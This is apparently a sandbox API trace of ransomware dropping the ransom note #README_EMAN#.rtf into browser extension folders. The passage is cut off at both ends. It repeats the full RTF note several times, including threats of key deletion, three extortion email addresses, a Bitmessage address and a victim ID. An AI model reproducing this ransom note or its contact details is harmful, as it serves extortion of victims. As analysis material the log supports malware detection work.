\\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0286.810] WriteFile (in: hFile=0x2f0, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.810] CloseHandle (hObject=0x2f0) returned 1 [0286.811] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\#readme_eman#.rtf")) returned 0x20 [0286.811] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0286.811] GetLastError () returned 0x2 [0286.811] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0287.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0287.030] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2462bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and 